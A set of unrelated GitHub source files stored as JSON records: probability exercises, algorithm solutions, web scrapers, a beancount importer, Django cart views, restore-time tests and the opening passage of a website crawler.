m*np.ones(n)).sum()/n\nprint(f\"On estime donc la probabilité P(S > m) par : {prob3_}\")\n\n# Faire un plot montrant la convergence de la différence entre ces deux probabilités\nfig = plt.figure(figsize = (6,4))\np_sup_t = (S1 > t*np.ones(n)).cumsum()\nind = np.argwhere(p_sup_t)\nplt.plot(np.arange(1,n+1)[ind],abs((S1 > (t+m)*np.ones(n)).cumsum()[ind]/p_sup_t[ind] -(S2 > m*np.ones(n)).cumsum()[ind]/np.arange(1,n+1)[ind]))\nfig.suptitle(\"Convergence de la différence en valeur absolue entre ces deux estimations\")\nfig.supylabel(\"Estimation de la probabilité\")\nfig.supxlabel(\"Nombre de variable générée\")\nplt.show()\n\n\n# ## Exercice 5: \n# \n# 1\\) Laquelle des fonctions suivantes est la densité d'une variable continue ? Reconnaissez-vous cette loi ?\n# \n# **Solution**: \n# Seules les deux dernières sont des fonctions de densité d'une variable continue car les deux autres ne satisfont pas $\\int_{\\mathbb{R}} f(x) dx = 1$. La figure 1 représente la fonction de densité d'une loi uniforme $\\mathcal{U}(0,1)$.\n# \n\n# In[ ]:\n\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfig, axs = plt.subplots(2, 2,figsize = (8,6))\naxs[0,0].plot(np.array([-1.,0.,0.,1.,1.,2.]),\n np.array([0.,0.,2.,2.,0.,0.]))\naxs[0,0].set_title(\"Figure 1\")\n\naxs[0,1].plot(np.array([-1.,0.25,0.25,0.75,0.75,2.]),\n np.array([0.,0.,1.,1.,0.,0.]))\naxs[0,1].set_title(\"Figure 2\")\n\naxs[1,0].plot(np.array([-1.,0.,0.,1.,1.,2.]),\n np.array([0.,0.,1.,1.,0.,0.]))\naxs[1,0].set_title(\"Figure 3\")\n\naxs[1,1].plot(np.array([-1.,-0.5,0.,0.5,1.,1.5,2.,2.5]),\n np.array([0.,0.,1.,0.,0.,1.,0.,0.]))\naxs[1,1].set_title(\"Figure 4\")\n\nplt.show()\n\n\n# ## Exercice 6: \n# \n# 1\\) Est-ce que les fonctions suivantes sont des fonctions de répartition? Si oui, le sont-elles pour des variables continues ou discrètes ?\n# \n# **Solution**: \n# - Le premier et le dernier graphique représentent des fonctions de répartition de lois discrètes.\n# - Le deuxième et le troisième représentent des fonctions de répartition de lois continues.\n# - Le quatrième graphique représente une fonction de répartition d'une loi qui est ni discrète, ni continue (c'est en fait une loi mixte).\n# - La fonction représentée sur le cinquième graphique n'est pas une fonction de répartition, car elle n'est pas croissante. \n# \n\n# In[ ]:\n\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfig, axs = plt.subplots(2, 3,figsize = (8.5,6.5))\naxs[0,0].plot(np.array([-10.,0.,0.,10.,10.,20.,20.,30.,30.,40.,40.,50.,50.,60.,60.,70.,70.,80.,80.,90.,90.,100.,100.,120.,120.]),\n np.array([0.,0.,0.1,0.1,0.19,0.19,0.25,0.25,0.34,0.34,0.45,0.45,0.5,0.5,0.57,0.57,0.61,0.61,0.63,0.63,0.65,0.65,0.67,0.67,0.67])/0.67)\naxs[0,0].set_title(\"Figure 1\")\n\naxs[0,1].plot(np.linspace(-2,4,100),np.exp(np.linspace(-2,4,100))/(1+np.exp(np.linspace(-2,4,100))))\naxs[0,1].set_title(\"Figure 2\")\n\naxs[0,2].plot(np.array([-1.,0.,1.,2.]),\n np.array([0.,0.,1.,1.]))\naxs[0,2].set_title(\"Figure 3\")\n\naxs[1,0].plot(np.array([-1.,0,1,2,2,3,4]),\n np.array([0.,0.,0.4,0.4,0.6,1.,1]))\naxs[1,0].set_title(\"Figure 4\")\n\naxs[1,1].plot(np.array([-1.,0,1,2,2,3,4]),\n np.array([0.,0.,0.4,0.,0.6,1.,1]))\naxs[1,1].set_title(\"Figure 5\")\n\naxs[1,2].plot(np.array([-1.,0,0,1,1,2]),\n np.array([0.,0.,0.4,0.4,1.,1]))\naxs[1,2].set_title(\"Figure 6\")\n\nplt.show()\n\n","repo_name":"MatthWilhelm/ProbaStat","sub_path":"book/_build/jupyter_execute/Correction/Python/Série2/Sol2P.py","file_name":"Sol2P.py","file_ext":"py","file_size_in_byte":17179,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22499605761","text":"# Geekina gave Geek a challenge, she asked Geek to choose any positive number (say x) and perform the operation at least twice - \n# Add x to your current score and double the value of x. \n# The challenge here is you must perform the above operation at least twice and after performing the above operation your score should be exactly k. \n# Could you help Geek by giving him largest x to start with or return -1 if such x does not exist? \n# Note: Initially the score is 0\n\n\n# # easy solution\n# def acceptTheChallenge(k):\n# n = k//3\n# for i in range(n, 0, -1):\n# score = 0\n# x = i\n# while(score < k):\n# score += x\n# x *= 2\n# if(score == k):\n# return i\n# return -1\n \n## advanced solution\n# score = x + 2 * (x + 2 * (x + ... + 2 * (x + 2 * 0)))\n# = x + 2 * (x + 2 * (x + ... + 2 * x))\n# = x + 2 * (x * (2^n - 1))\n# = x * (2^(n+1) - 1)\n\n\ndef acceptTheChallenge(k):\n n = 2\n while True:\n divisor = 2**n - 1\n if divisor > k:\n return -1\n elif k % divisor == 0:\n x = k // divisor\n if x <= k // 3:\n return x\n n += 1\n \nprint(acceptTheChallenge(8))\n# Output:\n# -1\n\n# Explanation:\n# It can be shown that there does not exist any x that can help Geek to have a score of exactly 8.\nprint(acceptTheChallenge(7))\n# Output:\n# 1\n\n# Explanation:\n# Geek will choose x = 1 and do the following operations - \n# Add 1 to score and double x. Therefore x = 2 and Score = 1\n# Now add 2 to score and double x. Therefore x = 4 and Score = 3\n# Now add 4 to the score and double x. Therefore x = 8 and Score = 7.\nprint(acceptTheChallenge(28))\nprint(acceptTheChallenge(33))","repo_name":"Sendy459/-LeetCode-Solutions-by-Daniel-Senderovych","sub_path":"Math/AcceptTheChallange_GeekForGeeks.py","file_name":"AcceptTheChallange_GeekForGeeks.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15345782190","text":"import urllib2\nfrom BeautifulSoup import BeautifulSoup\n\ndef remove_script(html):\n\t# removes everything (including the tag itself) between ' block is included.\n\tsplits = html.split('')[1:])\n\treturn front + back\n\t\n\n\n\t\n\nclass Book():\n\tdef __init__(self, book_id):\n\t\tself.base_url = 'http://gutenberg.spiegel.de/'\n\t\tself.book_id = book_id\n\t\t\n\tdef download(self):\n\t\tself.filename_tmp = 'gutenberg_book_%d.html.tmp' % self.book_id\n\t\tfh = open(self.filename_tmp, 'w')\n\t\tfor chapter in self.chapters():\n\t\t\tfh.write(str(chapter))\n\t\tfh.close()\n\t\t\t\n\tdef chapters(self):\n\t\tchapter = 1\n\t\twhile True:\n\t\t\tcontent = self.get_chapter(chapter)\n\t\t\tif content == None:\n\t\t\t\tbreak\n\t\t\tyield content\n\t\t\tchapter += 1\n\t\t\t\n\tdef get_chapter(self, chapter):\n\t\turi = self.generate_uri(chapter=chapter)\n\t\tsoup = self.get_soup(uri)\n\t\tcontent = soup.find('div', id='gb_texte')\n\t\treturn content\n\t\t\t\n\tdef get_soup(self, chapter):\n\t\turi = self.generate_uri(chapter)\n\t\tresponse = urllib2.urlopen(uri)\n\t\thtml = remove_script(response.read())\n\t\treturn BeautifulSoup(html)\n\t\t\n\tdef generate_uri(self, chapter):\n\t\tid = 12 # The id-parameter determines which page is called. 12 is \"printable\", 5 is standard text\n\t\treturn self.base_url + '?id=' + str(id) + '&xid=' + str(self.book_id) + '&kapitel=' + str(chapter)\n\t\n\tdef save_as(self, filename):\n\t\tif not self.filename_tmp:\n\t\t\tself.download()\n\t\tin_file = open(self.filename_tmp, 'r')\n\t\tout_file = open(filename, 'w')\n\t\theader = '''\n\n\n\n\n\n
''' % (self.base_url)\n\t\tfooter = '''
\n\n'''\n\t\tout_file.write(header)\n\t\tout_file.write(in_file.read()) \n\t\tout_file.write(footer)\n\t\tout_file.close()\n\t\t\n\t\t\n\tdef __del__(self):\n\t\t#Implement something to delete the self.filename_tmp file.\n\t\tpass\n\nif __name__=='__main__':\n\tbook = Book(book_id = 2418) #2418 is Kabale und Liebe von Schiller\n\tbook.download()\n\tbook.save_as('Kabale_und_Liebe.html')","repo_name":"siedentop/Gutenberg","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15031748719","text":"import sys\r\nsys.setrecursionlimit(int(1e9))\r\n\r\nclass LCA:\r\n LOG_V = 17\r\n root = 0\r\n def __init__(self, number_of_node):\r\n self.V = number_of_node\r\n self.G = [[] for i in range(number_of_node)]\r\n self.parent = [[-1]*number_of_node for i in range(self.LOG_V)]\r\n self.depth = [0] * number_of_node\r\n self.D = [0] * number_of_node\r\n \r\n \r\n def add_edge(self,a, b, c):\r\n self.G[a].append((b, c))\r\n self.G[b].append((a, c))\r\n \r\n def invoke_dfs(self):\r\n parent = self.parent\r\n depth = self.depth\r\n D = self.D\r\n G = self.G\r\n def dfs(v, p, d, c):\r\n parent[0][v] = p\r\n depth[v] = d\r\n D[v] = c\r\n for to, cost in G[v]:\r\n if to != p:\r\n dfs(to, v, d+1, c + cost)\r\n dfs(self.root, -1, 0, 0)\r\n \r\n def getAnc(self, v, n):\r\n parent = self.parent\r\n for k in range(self.LOG_V):\r\n if v != -1 and ((n>>k) & 1):\r\n v = parent[k][v];\r\n return v\r\n\r\n def build(self):\r\n self.invoke_dfs()\r\n parent = self.parent\r\n for k in range(self.LOG_V-1):\r\n for v in range(self.V):\r\n if parent[k][v] < 0:\r\n parent[k+1][v] = -1\r\n else:\r\n parent[k+1][v] = parent[k][parent[k][v]]\r\n \r\n \r\n def lca(self, u, v):\r\n depth = self.depth\r\n if depth[u] > depth[v]:\r\n u, v = v, u\r\n v = self.getAnc(v, depth[v] - depth[u])\r\n if u == v:\r\n return u;\r\n\r\n parent = self.parent\r\n for k in range(self.LOG_V-1, -1, -1):\r\n if parent[k][u] != parent[k][v]:\r\n u = parent[k][u]\r\n v = parent[k][v]\r\n return parent[0][u];\r\n\r\n def getDis (self, u, v):\r\n return self.D[u] + self.D[v] - 2 * self.D[self.lca(u, v)];\r\n \r\n\r\n\r\nN = int(input())\r\nlca = LCA(N)\r\nadd_edge = lca.add_edge\r\nfor i in range(N-1):\r\n x, y = (int(i) for i in sys.stdin.readline().split())\r\n #x, y = (int(i) for i in input().split())\r\n add_edge(x - 1, y - 1, 1)\r\n \r\nlca.build()\r\n\r\nQ = int(input())\r\ngetDis = lca.getDis\r\ndepth = lca.depth\r\nlca = lca.lca\r\nfor i in range(Q):\r\n a, b = (int(i) for i in sys.stdin.readline().split())\r\n a = a - 1\r\n b = b - 1\r\n #a, b = (int(i) for i in input().split())\r\n ans = depth[a] + depth[b] - 2 * depth[lca(a, b)] + 1;\r\n print (ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc014/D/2898298.py","file_name":"2898298.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"70383228392","text":"# -*- coding: UTF-8 -*-\n\n\"\"\"Importer for 微信\n\"\"\"\n__copyright__ = \"Copyright (C) 2019 He Yeshuang\"\n__license__ = \"GNU GPLv2\"\n\nimport csv\nimport datetime\nimport logging\nimport re\nimport sys\nfrom enum import Enum\nfrom os import path\nfrom typing import Dict\n\nfrom beancount.core import account, data, position\nfrom beancount.core.amount import Amount\nfrom beancount.core.number import ZERO, D\nfrom beancount.ingest import importer\nfrom dateutil.parser import parse\n# from smart_importer import PredictPostings, PredictPayees\n\nclass WechatImporter(importer.ImporterProtocol):\n \"\"\"An importer for Wechat CSV files.\"\"\"\n\n def __init__(self, accountDict: Dict):\n # print(file_type)\n self.accountDict = accountDict\n self.currency = \"CNY\"\n pass\n\n def identify(self, file):\n # Match if the filename is as downloaded and the header has the unique\n # fields combination we're looking for.\n return (re.search(r\"微信支付账单\", path.basename(file.name)))\n\n def file_name(self, file):\n return 'wechat.{}'.format(path.basename(file.name))\n\n def file_account(self, _):\n return \"Assets:WeChat:Wallet\"\n\n def file_date(self, file):\n # Extract the statement date from the filename.\n return datetime.datetime.strptime(path.basename(file.name).split(\"-\")[-1],\n '%Y%m%d).csv').date()\n\n def extract(self, file, existing_entries=None):\n # Open the CSV file and create directives.\n entries = []\n index = 0\n with open(file.name, encoding=\"utf-8\") as f:\n for _ in range(16):\n next(f)\n for index, row in enumerate(csv.DictReader(f)):\n if \"转入零钱通\" in row[\"交易类型\"]:\n continue # skip the transfer to wechat\n\n meta = data.new_metadata(file.name, index)\n date = parse(row['交易时间']).date()\n raw_amount = D(row['金额(元)'].lstrip(\"¥\"))\n isExpense = True if (row['收/支'] == '支出' or row['收/支'] == '/') else False\n if isExpense:\n raw_amount = -raw_amount\n amount = Amount(raw_amount, self.currency)\n payee = row['交易对方']\n narration = row['商品']\n account_1_text = row['支付方式']\n account_1 = 'Assets.FIXME'\n # print(raw_amount,narration,account_1_text,account_2_text)\n for asset_k, asset_v in self.accountDict.items():\n if account_1_text.find(asset_k) != -1:\n # print(asset_k, asset_v)\n account_1 = asset_v\n\n txn = data.Transaction(\n meta, date, self.FLAG, payee, narration, data.EMPTY_SET, data.EMPTY_SET, [\n data.Posting(account_1, amount,\n None, None, None, None),\n ])\n\n entries.append(txn)\n\n # Insert a final balance check.\n\n return entries\n\n\n# @PredictPostings()\n# @PredictPayees()\n# class SmartWechatImporter(WechatImporter):\n# pass\n","repo_name":"heyeshuang/beancount-homemade-importers","sub_path":"importers/wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"26048560329","text":"height, width, num_bricks = input().split()\nwidths_list = [int(x) for x in input().split()]\n\nres = 0\nh = 0\nwidth = int(width)\nwhile widths_list:\n res += widths_list.pop(0)\n if res == width:\n h += 1\n if h == int(height):\n print(\"YES\")\n break\n res = 0\n elif res > width:\n print(\"NO\")\n break\n","repo_name":"marbrb/practice-contest","sub_path":"Kattis/Anotherbrick.py","file_name":"Anotherbrick.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2399635146","text":"\n# Import Splinter and BeautifulSoup\nfrom splinter import Browser, browser\nfrom bs4 import BeautifulSoup as soup\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport pandas as pd\nimport datetime as dt\n\n#function to initialize the browser and create a dict\ndef scrape_all():\n #initiate the headless driver for deployment\n #executable_path and browser path\n executable_path = {'executable_path': ChromeDriverManager().install()}\n browser = Browser('chrome', **executable_path, headless=True)\n news_title, news_paragraph = mars_news(browser)\n #url_image, title = hemi(browser)\n hemisphere_image_urls = hemi(browser)\n #url_image, title = hemisphere_image_urls\n \n # Run all scraping functions and store results in dictionary\n data = {\n \"news_title\": news_title,\n \"news_paragraph\": news_paragraph,\n \"featured_image\": featured_image(browser),\n \"facts\": mars_facts(),\n \"last_modified\": dt.datetime.now(),\n \"url_hemi\": hemisphere_image_urls,\n #\"url_image\": url_image,\n #\"title\" : title\n }\n browser.quit()\n return data\n\ndef mars_news(browser):\n # Visit the mars nasa news site\n url = 'https://redplanetscience.com'\n browser.visit(url)\n # Optional delay for loading the page\n browser.is_element_present_by_css('div.list_text', wait_time=1)\n\n\n # Convert the browser html to a soup object and then quit the browser\n html = browser.html\n news_soup = soup(html, 'html.parser')\n \n try: \n slide_elem = news_soup.select_one('div.list_text')\n ##slide_elem.find('div', class_='content_title')\n news_title = slide_elem.find('div', class_='content_title').get_text()\n # Use the parent element to find the paragraph text\n news_p = slide_elem.find('div', class_='article_teaser_body').get_text()\n except AttributeError:\n return None, None\n return news_p, news_title\n\n\ndef featured_image(browser):\n # Visit URL\n url = 'https://spaceimages-mars.com'\n browser.visit(url)\n\n # Find and click the full image button\n full_image_elem = browser.find_by_tag('button')[1]\n full_image_elem.click()\n\n # Parse the resulting html with soup\n html = browser.html\n img_soup = soup(html, 'html.parser')\n\n try:\n # Find the relative image url\n img_url_rel = img_soup.find('img', class_='headerimage fade-in').get('src')\n except AttributeError:\n return None\n\n\n # Use the base URL to create an absolute URL\n img_url = f'https://spaceimages-mars.com/{img_url_rel}'\n return img_url\n\ndef mars_facts():\n #expert to a dataframe\n try:\n df = pd.read_html('https://galaxyfacts-mars.com')[0]\n except BaseException:\n return None\n df.columns=['description', 'Mars', 'Earth']\n df.set_index('description', inplace=True)\n return df.to_html(classes=\"table table-hover\")\n \n\ndef hemi(browser):\n # 1. Use browser to visit the URL \n url = 'https://marshemispheres.com/'\n browser.visit(url)\n browser.is_element_present_by_css('div.list_text', wait_time=1)\n # Parse the resulting html with soup\n html = browser.html\n img_soup = soup(html, 'html.parser')\n # 2. Create a list to hold the images and titles.\n hemisphere_image_urls = []\n# 3. Write code to retrieve the image urls and titles for each hemisphere.\n for image in img_soup.find_all('div', class_='item'):\n hemispheres = {}\n if image.find('a', class_='itemLink product-item'):\n image_link = image.find(href=True).get('href')\n link = url+image_link\n browser.visit(link)\n enhan_img_soup = soup(browser.html, 'html.parser')\n full_image_elem = enhan_img_soup.find('img', class_='wide-image').get('src')\n img_url = url+full_image_elem\n hemispheres.update({'url_image': img_url})\n hemi_title = image.find('h3').text\n hemispheres.update({'title': hemi_title})\n hemisphere_image_urls.append(hemispheres)\n #print(hemispheres)\n #return(hemispheres)\n return hemisphere_image_urls \n # return hemispheres\n \n\nif __name__ == \"__main__\":\n #if running as script, print scraped data\n print(scrape_all())\n #print(hemi(browser))\n\n","repo_name":"airplane3333/Mission-to-Mars","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18128492859","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom shop.models import Product\nfrom .cesta import Cesta\nfrom .forms import CestaAddProductForm\nfrom django.shortcuts import render, redirect\n\n@require_POST\ndef cesta_add(request, product_id):\n cesta = Cesta(request)\n product = get_object_or_404(Product, id=product_id)\n form = CestaAddProductForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n cesta.add(product=product,\n quantity=cd['quantity'],\n override_quantity=cd['override'])\n return redirect('cesta:cesta_detail')\n\n@require_POST\ndef cesta_remove(request, product_id):\n cesta = Cesta(request)\n product = get_object_or_404(Product, id=product_id)\n cesta.remove(product)\n return redirect('cesta:cesta_detail')\n\ndef cesta_detail(request):\n cesta = Cesta(request)\n for item in cesta:\n item['update_quantity_form'] = CestaAddProductForm(initial={\n 'quantity': item['quantity'],\n 'override': True})\n return render(request, 'cesta/detail.html', {'cesta': cesta})\n\n","repo_name":"Miguel-Angel-Roldan-Garcia/PGPI-3.11-Motosaurio","sub_path":"motosaurio/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23252380735","text":"# -*- coding: utf-8 -*-\n\n################################################\n#\n# URL:\n# =====\n# https://leetcode.com/problems/minimum-size-subarray-sum/\n#\n# DESC:\n# =====\n# Given an array of n positive integers and a positive integer s,\n# find the minimal length of a contiguous subarray of which the sum ≥ s.\n# If there isn't one, return 0 instead.\n#\n# Example:\n# Input: s = 7, nums = [2,3,1,2,4,3]\n# Output: 2\n# Explanation: the subarray [4,3] has the minimal length under the problem constraint.\n#\n# Follow up:\n# If you have figured out the O(n) solution,\n# try coding another solution of which the time complexity is O(n log n).\n################################################\nfrom typing import List\n\n\nclass Solution:\n def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n start = 0\n sum = 0\n minLen = len(nums) + 1\n\n for i in range(len(nums)):\n sum += nums[i]\n while sum - nums[start] >= s:\n sum -= nums[start]\n start += 1\n if sum >= s:\n minLen = min(minLen, i - start + 1)\n\n return minLen if minLen <= len(nums) else 0\n","repo_name":"huajianmao/pyleet","sub_path":"solutions/a0209minimumsizesubarraysum.py","file_name":"a0209minimumsizesubarraysum.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"68994939","text":"\"\"\"\nRestore time computing tests\n\"\"\"\nimport pytest\nfrom datetime import datetime, timedelta\nfrom dbaas_internal_api.utils.types import (\n Backup,\n ClusterBackup,\n DTYPE_LOCAL_SSD,\n DTYPE_NETWORK_HDD,\n DTYPE_NETWORK_SSD,\n DTYPE_NRD,\n ExistedHostResources,\n GIGABYTE,\n MEGABYTE,\n TERABYTE,\n VTYPE_COMPUTE,\n VTYPE_PORTO,\n)\nfrom dbaas_internal_api.utils.time import compute_restore_time_limit_2\n\n# pylint: disable=missing-docstring, invalid-name\n\n\ndef getDefaultFlavor():\n return {\n 'io_limit': 400 * MEGABYTE,\n 'vtype': VTYPE_PORTO,\n 'network_limit': 400 * MEGABYTE,\n 'cpu_guarantee': 2,\n 'cpu_fraction': 100,\n }\n\n\ndef getDefaultHostResources() -> ExistedHostResources:\n return ExistedHostResources(disk_size=48 * GIGABYTE, disk_type_id=DTYPE_LOCAL_SSD)\n\n\nclass Tests_restore_time_computing:\n def test_time_earlier_Backup_start_fails(self):\n with pytest.raises(RuntimeError):\n flavor = getDefaultFlavor()\n backup = Backup(\"some_id\", datetime(2021, 1, 1, 12, 00), datetime(2021, 1, 1, 12, 30))\n\n compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 11),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n\n def test_backup_uses_disk_size(self):\n flavor = getDefaultFlavor()\n backup = Backup(\"some_id\", datetime(2021, 1, 1, 12, 00), datetime(2021, 1, 1, 12, 30))\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n assert result == timedelta(seconds=11352, microseconds=960000)\n\n def test_use_disk_size_when_uncompressed_unknown(self):\n flavor = getDefaultFlavor()\n backup = ClusterBackup(\"some_id\", datetime(2021, 1, 1, 12, 00), datetime(2021, 1, 1, 12, 30))\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n assert result == timedelta(seconds=11352, microseconds=960000)\n\n def test_use_uncompressed_size(self):\n flavor = getDefaultFlavor()\n backup = ClusterBackup(\n \"some_id\", datetime(2021, 1, 1, 12, 00), datetime(2021, 1, 1, 12, 30), uncompressed_size=100 * GIGABYTE\n )\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n assert result == timedelta(seconds=11952)\n\n def test_use_network_limit(self):\n flavor = getDefaultFlavor()\n flavor['network_limit'] = 10 * MEGABYTE\n backup = ClusterBackup(\n \"some_id\",\n datetime(2021, 1, 1, 12, 00),\n datetime(2021, 1, 1, 12, 30),\n size=30 * GIGABYTE,\n uncompressed_size=100 * GIGABYTE,\n )\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=getDefaultHostResources(),\n )\n assert result == timedelta(seconds=24624)\n\n def test_use_software_io_limit(self):\n flavor = getDefaultFlavor()\n flavor['vtype'] = VTYPE_COMPUTE\n backup = ClusterBackup(\n \"some_id\",\n datetime(2021, 1, 1, 12, 00),\n datetime(2021, 1, 1, 12, 30),\n size=30 * GIGABYTE,\n uncompressed_size=100 * GIGABYTE,\n )\n dest_resources = ExistedHostResources(disk_size=2 * TERABYTE, disk_type_id=DTYPE_NETWORK_SSD)\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=dest_resources,\n software_io_limit=65 * MEGABYTE,\n )\n assert result == timedelta(seconds=17889, microseconds=230766)\n\n @pytest.mark.parametrize(\n ['disk_size', 'disk_type', 'expected_timedelta'],\n [\n (100 * GIGABYTE, DTYPE_NETWORK_HDD, timedelta(seconds=26160)),\n (100 * GIGABYTE, DTYPE_NETWORK_SSD, timedelta(seconds=18480)),\n # 500 < 400 test network limit, use network limit\n (100 * GIGABYTE, DTYPE_LOCAL_SSD, timedelta(seconds=11721, microseconds=600000)),\n (100 * GIGABYTE, DTYPE_NRD, timedelta(seconds=13609, microseconds=756098)),\n # after disk size 450MB/15MB * 32GB we should use disk limit of 450MB/s for network ssd\n (2 * TERABYTE, DTYPE_NETWORK_SSD, timedelta(seconds=11824, microseconds=2)),\n (3 * TERABYTE, DTYPE_NETWORK_SSD, timedelta(seconds=11824, microseconds=2)),\n ],\n )\n def test_use_formula(self, disk_size, disk_type, expected_timedelta):\n flavor = getDefaultFlavor()\n flavor['vtype'] = VTYPE_COMPUTE\n backup = ClusterBackup(\n \"some_id\",\n datetime(2021, 1, 1, 12, 00),\n datetime(2021, 1, 1, 12, 30),\n size=30 * GIGABYTE,\n uncompressed_size=100 * GIGABYTE,\n )\n dest_resources = ExistedHostResources(disk_size=disk_size, disk_type_id=disk_type)\n\n result = compute_restore_time_limit_2(\n dest_flavor=flavor,\n backup=backup,\n time=datetime(2021, 1, 1, 13),\n src_resources=getDefaultHostResources(),\n dest_resources=dest_resources,\n )\n assert result == expected_timedelta\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"cloud/tests/modules/mysql/test_restore_time_computing.py","file_name":"test_restore_time_computing.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1194609298","text":"#!/usr/bin/env python3\n\nimport re\nimport bs4\nimport lxml\nimport json\nimport asyncio\nimport requests\nimport threading\nimport tldextract\nfrom datetime import date\nfrom modules.export import export\nrequests.packages.urllib3.disable_warnings()\n\nR = '\\033[31m' # red\nG = '\\033[32m' # green\nC = '\\033[36m' # cyan\nW = '\\033[0m' # white\nY = '\\033[33m' # yellow\n\nuser_agent = {'User-Agent': 'FinalRecon'}\n\nsoup = ''\ntotal = []\nr_total = []\nsm_total = []\njs_total = []\ncss_total = []\nint_total = []\next_total = []\nimg_total = []\njs_crawl_total = []\nsm_crawl_total = []\n\n\ndef crawler(target, output, data):\n\tglobal soup, r_url, sm_url\n\tprint(f'\\n{Y}[!] Starting Crawler...{W}\\n')\n\n\ttry:\n\t\trqst = requests.get(target, headers=user_agent, verify=False, timeout=10)\n\texcept Exception as e:\n\t\tprint(f'{R} [-] Exception : {C}{e}{W}')\n\t\treturn\n\n\tsc = rqst.status_code\n\tif sc == 200:\n\t\tpage = rqst.content\n\t\tsoup = bs4.BeautifulSoup(page, 'lxml')\n\n\t\tprotocol = target.split('://')\n\t\tprotocol = protocol[0]\n\t\ttemp_tgt = target.split('://')[1]\n\t\tpattern = r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d{2,5}'\n\t\tcustom = bool(re.match(pattern, temp_tgt))\n\t\tif custom is True:\n\t\t\tr_url = f'{protocol}://{temp_tgt}/robots.txt'\n\t\t\tsm_url = f'{protocol}://{temp_tgt}/sitemap.xml'\n\t\t\tbase_url = f'{protocol}://{temp_tgt}'\n\t\telse:\n\t\t\text = tldextract.extract(target)\n\t\t\thostname = '.'.join(part for part in ext if part)\n\t\t\tbase_url = f'{protocol}://{hostname}'\n\t\t\tr_url = f'{base_url}/robots.txt'\n\t\t\tsm_url = f'{base_url}/sitemap.xml'\n\n\t\tloop = asyncio.new_event_loop()\n\t\tasyncio.set_event_loop(loop)\n\t\ttasks = asyncio.gather(\n\t\t\trobots(r_url, base_url, data, output),\n\t\t\tsitemap(sm_url, data, output),\n\t\t\tcss(target, data, output),\n\t\t\tjs(target, data, output),\n\t\t\tinternal_links(target, data, output),\n\t\t\texternal_links(target, data, output),\n\t\t\timages(target, data, output),\n\t\t\tsm_crawl(data, output),\n\t\t\tjs_crawl(data, output))\n\t\tloop.run_until_complete(tasks)\n\t\tloop.close()\n\t\tstats(output, data)\n\telse:\n\t\tprint(f'{R}[-] {C}Status : {W}{sc}')\n\n\ndef url_filter(target, link):\n\tif all([link.startswith('/') is True, link.startswith('//') is False]):\n\t\tret_url = target + link\n\t\treturn ret_url\n\telse:\n\t\tpass\n\n\tif link.startswith('//') is True:\n\t\tret_url = link.replace('//', 'http://')\n\t\treturn ret_url\n\telse:\n\t\tpass\n\n\tif all([\n\t\tlink.find('//') == -1,\n\t\tlink.find('../') == -1,\n\t\tlink.find('./') == -1,\n\t\tlink.find('http://') == -1,\n\t\tlink.find('https://') == -1]\n\t):\n\t\tret_url = f'{target}/{link}'\n\t\treturn ret_url\n\telse:\n\t\tpass\n\n\tif all([\n\t\tlink.find('http://') == -1,\n\t\tlink.find('https://') == -1]\n\t):\n\t\tret_url = link.replace('//', 'http://')\n\t\tret_url = link.replace('../', f'{target}/')\n\t\tret_url = link.replace('./', f'{target}/')\n\t\treturn ret_url\n\telse:\n\t\tpass\n\treturn link\n\nasync def robots(robo_url, base_url, data, output):\n\tglobal r_total\n\tprint(f'{G}[+] {C}Looking for robots.txt{W}', end='', flush=True)\n\n\ttry:\n\t\tr_rqst = requests.get(robo_url, headers=user_agent, 